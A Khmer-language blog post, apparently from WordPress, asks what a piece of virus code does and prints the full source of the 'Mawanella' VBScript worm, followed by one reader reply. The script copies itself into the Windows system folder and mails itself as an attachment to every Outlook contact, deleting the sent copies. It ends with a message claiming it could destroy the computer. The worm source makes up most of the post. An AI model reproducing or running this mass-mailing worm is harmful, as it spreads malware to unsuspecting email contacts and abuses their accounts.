កូដមេរោគស្អីគេអីចេះ? (កូដទី២)


On Error Resume Next
Rem // I hate Mawanella incident
Set W_S = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()

sub main()
  On Error Resume Next
  dim wscr,rr, strMsg
  set wscr=CreateObject("WScript.Shell")
   Set dirwin = fso.GetSpecialFolder(0)
   Set dirsystem = fso.GetSpecialFolder(1)
   Set dirtemp = fso.GetSpecialFolder(2)
   Set cFile = fso.GetFile(WScript.ScriptFullName)
   cFile.Copy(dirsystem&"\Mawanella.vbs")
   
Set OutlookA = CreateObject("Outlook.Application")
If OutlookA = "Outlook" Then
  Set Mapi=OutlookA.GetNameSpace("MAPI")
  Set AddLists=Mapi.AddressLists
  For Each ListIndex In AddLists
    If ListIndex.AddressEntries.Count <> 0 Then
	 ContactCountX = ListIndex.AddressEntries.Count
	 For Count= 1 To ContactCountX
       Set MailX = OutlookA.CreateItem(0)
	   Set ContactX = ListIndex.AddressEntries(Count)
       'msgbox contactx.address
       'Mailx.Recipients.Add(ContactX.Address)
       MailX.To = ContactX.Address
	   MailX.Subject = "Mawanella"
	   MailX.Body = vbcrlf&"Mawanella is one of the Sri Lanka's Muslim Village"&vbcrlf
	   'Set Attachment=MailX.Attachments
	   'Attachment.Add dirsystem & "\Mawanella.vbs"
	   'Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
	   Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
	   MailX.DeleteAfterSubmit = True
	   If MailX.To <> "" Then
		 MailX.Send
 	   End If
      Next
    End If
  Next
Else
  msgBox "Please Forward this to everyone" 
End if

strMsg= " )          (" & vbcrlf
strMsg= strMsg & "( )        (  ) " & vbcrlf
strMsg= strMsg & " (  )     (  )" & vbcrlf
strMsg= strMsg & "  (  )   (     )" & vbcrlf
strMsg= strMsg & "  -------------------------" & vbcrlf
strMsg= strMsg & "  /    (  (  (   /\" & vbcrlf
strMsg= strMsg & " /     (       / \" & vbcrlf
strMsg= strMsg & " /      ( (     /  \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " |        ---   |   |" & vbcrlf
strMsg= strMsg & " | -----    |  |   |   |" & vbcrlf
strMsg= strMsg & " | |   |    ---    |   |" & vbcrlf
strMsg= strMsg & " | |   |         |   |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf

strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf 
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf 
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf 
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
 
msgbox strMsg,,"Mawanella"

End sub

មើលកាន់តែលែងយល់ទៅទៀត ខ្ញុំមិនសូវដឹងទេ គ្រាន់តែចង់សាកមើលដែរ
Advertisements

About Nataro

ក្នុងលោក គ្មានអ្វីដែលល្អគ្រប់ដប់នោះទេ
អត្ថបទនេះត្រូវបាន​ផ្សាយក្នុង ពីណាពីណី។ ប៊ុកម៉ាក តំណភ្ជាប់​អចិន្ត្រៃ​យ៍​

2 Responses to កូដមេរោគស្អីគេអីចេះ? (កូដទី២)

 1. ដូចគាត់និយាយ, កូដនេះអត់ធ្វើអីក្រៅពីផ្ញើរម៉េលចេញ និងអេកូ សារប៉ុន្មានជួរអោយមើលប៉ុណ្ណោះ

ឆ្លើយ​តប

Fill in your details below or click an icon to log in:

ឡូហ្កូ WordPress.com

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី WordPress.com របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

Google+ photo

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Google+ របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូប Twitter

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Twitter របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

រូបថត Facebook

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Facebook របស់​អ្នក​។ Log Out /  ផ្លាស់ប្តូរ )

w

កំពុង​ភ្ជាប់​ទៅ​កាន់ %s